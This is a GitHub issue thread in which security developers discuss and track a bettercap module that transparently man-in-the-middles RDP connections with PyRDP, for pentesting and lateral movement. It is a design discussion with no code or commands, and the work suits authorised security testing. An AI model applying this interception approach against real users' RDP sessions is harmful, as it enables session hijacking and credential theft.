obilodeau
commented
5 years ago Closed obilodeau closed 4 years ago
obilodeau
commented
5 years ago 
alxbl
commented
5 years ago I looked into this. One step better would be to use nfqueues with the nat table to automatically setup a PyRDP instance per host and effectively MITM transparently (well, as transparent as MITM can be) across any intercepted RDP connection. This would be perfect for pentesting scenarios where RDP can be used as a form of lateral movement or even to gain initial foothold.
I started prototyping a bettercap module (neither tcp.proxy nor packet.proxy do quite what is required). However, there is going to be a lot of work required for this to scale well and be production ready. That being said, a proof of concept should be a good starting point.
Here's the gist of how it works behind the scene:
-s and --dport here)Eventually, PyRDP can be refactored to support multi-target in a single instance, and the bettercap module could be adjusted to communicate the target to PyRDP.
Here's where I'm at right now
packet.proxy as a starting pointI think it should be feasible to get a prototype over the weekend. We can tackle performance issues once it actually has a working form.
alxbl
commented
5 years ago The Proof of Concept now has support for managing PyRDP instances and dynamically creating/cleaning firewall rules. At this point I'd be ready to give it a test run in a lab with actual RDP hijacking. The only thing I want to do before pushing my changes to my repo and open sourcing it is documenting how it works and figuring out how to integrate with bettercap's events.stream and net.sniff modules.
We should also probably give it a spin in a closed off lab environment with real RDP connections (I've been testing with nc :) )
Pourliver
commented
5 years ago I updated the list above. Once #107 gets merged, I think the only thing left would be to test the tool out of the "lab" environment.
Pourliver
commented
5 years ago So, its been a while since the bettercap part is done feature-wise. The documentation linked above hasn't been updated in almost two months, but it has been used successfully by someone who had no bettercap and no PyRDP.
So, instead of letting this issue stall, should we try and make a PR upstream? If we do, I'll strip some of the RDP-Relay code since its not yet ready.
alxbl
commented
5 years ago I have no objections with opening the PR. We'll see what upstream has to say about it and we can make any changes needed to get it accepted.
The only thing I can think of as a nice to have would be a screen capture/demo of the tool in action.
Cheers!
Pourliver
commented
5 years ago Maybe I could record something, I've seen some gifs on Github showcasing features before.
Pourliver
commented
5 years ago So, I merged the documentation after reviewing with @Romounet, and I'd like to open a PR to merge to bettercap's upstream before the end of my internship. I'll make a PR once I feel like the code is clean enough (see https://github.com/GoSecure/bettercap/pull/7)
alxbl
commented
4 years ago The PR was rejected upstream due to having too many external dependencies. That being said, I'm closing this issue as we now have working integration in our bettercap fork (https://github.com/gosecure/bettercap).
We might revisit integration with upstream in the form of a more generic module, but for the time being this works fine.
Right now when in use with bettercap, the mitm's destination is fixed. I think that with the proper bettercap tcp.proxy module we could spawn an instance of pyrdp-mitm with the proper destination configured on-the-fly.
@Res260 highlighted the fact that we will probably face problems with servers that need NLA to be set. Need to keep this in mind.